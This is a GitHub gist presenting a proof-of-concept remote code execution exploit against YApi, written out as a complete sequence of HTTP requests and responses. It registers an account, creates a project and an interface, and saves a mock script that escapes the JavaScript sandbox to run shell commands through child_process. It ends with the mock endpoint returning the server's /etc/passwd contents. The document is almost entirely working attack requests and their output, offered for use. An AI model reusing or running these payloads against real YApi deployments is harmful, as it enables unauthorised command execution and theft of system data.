Skip to content

Instantly share code, notes, and snippets.

@pikpikcu

pikpikcu/YApi-RCE.md

Last active July 16, 2021 22:12
Show Gist options
  • Star 4 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save pikpikcu/0145fb71203c8a3ad5c67b8aab47165b to your computer and use it in GitHub Desktop.
Save pikpikcu/0145fb71203c8a3ad5c67b8aab47165b to your computer and use it in GitHub Desktop.
Download ZIP
YApi-RCE
Raw
YApi-RCE.md

POC YApi RCE:

Reference:

POC

Requests:

POST /api/user/reg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 94
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{"email":"test@qq.com","password":"test12345","username":"hacker"}

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 202
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:40 GMT
Set-Cookie: _yapi_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjMxMCwiaWF0IjoxNjI2MzExMDgwLCJleHAiOjE2MjY5MTU4ODB9.L3CgGWZ7IvTxrIOW-hILPh69jUCOv9ATHRMEgpAZcAI; path=/; expires=Thu, 22 Jul 2021 01:04:40 GMT; httponly
Set-Cookie: _yapi_uid=310; path=/; expires=Thu, 22 Jul 2021 01:04:40 GMT; httponly

{"errcode":0,"errmsg":"成功!","data":{"uid":310,"email":"test@qq.com","username":"test12345","add_time":1626311080,"up_time":1626311080,"role":"member","type":"site","study":false}}

Requests:

GET /api/group/list HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/json, text/plain, */*
Accept-Encoding: gzip

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 191
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:41 GMT

{"errcode":0,"errmsg":"成功!","data":[{"custom_field1":{"enable":false},"type":"private","_id":828,"group_name":"个人空间","add_time":1626311080,"up_time":1626311080,"role":"owner"}]}

Request:

POST /api/project/add HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 106
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{"name":"pocccccc","basepath":"","group_id":"828","icon":"code-o","color":"cyan","project_type":"private"}

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 423
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:41 GMT

{"errcode":0,"errmsg":"成功!","data":{"switch_notice":true,"is_mock_open":false,"strice":false,"is_json5":false,"name":"pocccccc","basepath":"","members":[],"project_type":"private","uid":310,"group_id":828,"icon":"code-o","color":"cyan","add_time":1626311081,"up_time":1626311081,"env":[{"header":[],"_id":"60ef89a944f602008ff90613","name":"local","domain":"http://127.0.0.1","global":[]}],"tag":[],"_id":761,"__v":0}}

Request:

GET /api/project/get?id=761 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 569
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:53 GMT

{"errcode":0,"errmsg":"成功!","data":{"switch_notice":true,"is_mock_open":false,"strice":false,"is_json5":false,"_id":761,"name":"pocccccc","basepath":"","project_type":"private","uid":310,"group_id":828,"icon":"code-o","color":"cyan","add_time":1626311081,"up_time":1626311081,"env":[{"header":[],"global":[],"_id":"60ef89a944f602008ff90613","name":"local","domain":"http://127.0.0.1"}],"tag":[],"cat":[{"index":0,"_id":263,"name":"公共分类","project_id":761,"desc":"公共分类","uid":310,"add_time":1626311081,"up_time":1626311081,"__v":0}],"role":"owner"}}

Request:

POST /api/interface/add HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 89
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{"method":"GET","catid":"761","title":"wlsifafyio","path":"/wlsifafyio","project_id":761}

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 487
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:55 GMT

{"errcode":0,"errmsg":"成功!","data":{"edit_uid":0,"status":"undone","type":"static","req_body_is_json_schema":false,"res_body_is_json_schema":false,"api_opened":false,"index":0,"tag":[],"method":"GET","catid":761,"title":"wlsifafyio","path":"/wlsifafyio","project_id":761,"req_params":[],"res_body_type":"json","query_path":{"path":"/wlsifafyio","params":[]},"uid":310,"add_time":1626311095,"up_time":1626311095,"req_query":[],"req_headers":[],"req_body_form":[],"_id":697,"__v":0}}

Request:

POST /api/plugin/advmock/save HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 382
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{"project_id":"761","interface_id":"697","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true}

Response:

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 471
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:55 GMT

{"errcode":0,"errmsg":"成功!","data":{"enable":true,"interface_id":697,"mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","project_id":761,"uid":"310","up_time":1626311095,"_id":240,"__v":0}}

Request:

GET /mock/761/wlsifafyio HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip

Response:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: undefined
Connection: keep-alive
Content-Length: 1236
Content-Type: text/plain; charset=utf-8
Date: Thu, 15 Jul 2021 01:04:56 GMT

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
node:x:1000:1000::/home/node:/bin/bash
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment